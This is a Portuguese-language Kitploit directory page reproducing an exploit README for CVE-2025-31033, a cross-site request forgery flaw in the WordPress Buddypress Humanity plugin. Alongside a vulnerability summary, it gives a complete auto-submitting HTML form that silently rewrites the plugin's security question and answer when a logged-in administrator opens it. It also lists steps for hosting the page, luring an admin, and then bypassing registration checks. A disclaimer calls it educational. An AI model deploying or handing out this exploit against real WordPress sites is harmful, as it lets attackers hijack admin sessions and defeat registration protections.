Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-31033 — O WordPress Buddypress Humanity Plugin <= 1.2 é vulnerável a Cross Site Request Forgery (CSRF) | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2025-31033
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebPapers e PesquisaAprendizado e Educação
GitHubnxploited/cve-2025-31033

CVE-2025-31033

O WordPress Buddypress Humanity Plugin <= 1.2 é vulnerável a Cross Site Request Forgery (CSRF)

Ver Repositório
1há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

⚠️ CVE-2025-31033 - CSRF no plugin Buddypress Humanity para WordPress <= 1.2

🛡️ Resumo da Vulnerabilidade

O plugin Buddypress Humanity para WordPress (versão <= 1.2) é vulnerável a Falsificação de Solicitação entre Sites (CSRF).
Esta vulnerabilidade permite que um atacante force um usuário com privilégios elevados (ex.: administrador) a modificar inconscientemente as configurações do plugin (como a pergunta e a resposta de segurança), contornando a lógica de verificação do usuário.


🐞 Tipo de Vulnerabilidade

  • Falsificação de Solicitação entre Sites (CSRF)
  • Componente Afetado: página bph-settings (somente admin)
  • CVE: CVE-2025-31033
  • Riscos: CVSS 9.8

🚨 Impacto

Se explorada com sucesso, esta vulnerabilidade permite que atacantes:

  • Alterem a pergunta de segurança e a resposta usadas durante o registro de usuário
  • Contornem a verificação de humanidade sabendo a nova resposta
  • Automatizem o registro de usuários (possivelmente combinado com escalonamento de privilégios)
  • Abusem das proteções do formulário de registro sem interação do usuário

  • 🎯 Plugin Afetado

    • Nome: Buddypress Humanity
    • Versão: ≤ 1.2
    • Slug: buddypress-humanity
    • Testado em: WordPress 6.x + BuddyPress ativo

    💥 Prova de Conceito (Exploit em HTML)

    root@kitploit:~
    <!DOCTYPE html>
    <html lang="en">
    <head>
      <meta charset="UTF-8">
      <title>Exploit – CVE-2025-31033</title>
    </head>
    <body onload="document.forms[0].submit();">
      <form action="http://target.com/wp-admin/admin.php?page=bph-settings" method="POST">
        <input type="hidden" name="bph_option[bph_title]" value="Nxploited">
        <input type="hidden" name="bph_option[bph_question]" value="I’m Nxploited | Khaled Alenazi">
        <input type="hidden" name="bph_option[bph_answers]" value="Nxploit">
        <input type="hidden" name="bph_submit" value="1">
      </form>
    </body>
    </html>
    

    ☠️ Assim que esta página for aberta por um administrador autenticado, ela modifica silenciosamente as configurações do plugin.


    🔧 Como Explorar

    1. Hospede o HTML da PoC em qualquer servidor externo.
    2. Engane um administrador do WordPress conectado para visitar a página.
    3. Ao visitar, o navegador dele enviará silenciosamente o formulário.
    4. A pergunta e a resposta de segurança do plugin serão atualizadas.
    5. O atacante agora pode se registrar usando a resposta conhecida.

    🧪 Resultados de uma Exploração Bem-sucedida:

    • Pergunta modificada: I’m Nxploited | Khaled Alenazi
    • Resposta modificada: Nxploit
    • Qualquer usuário que inserir "Nxploit" contornará a verificação.

    ⚠️ Aviso Legal

    Esta prova de conceito é apenas para fins educacionais.
    Use com responsabilidade e não teste em sistemas que você não possui.
    O autor não é responsável por qualquer uso indevido ou dano causado.


    👤 Por

    Nxploited | Khaled Alenazi

    Baixar ferramenta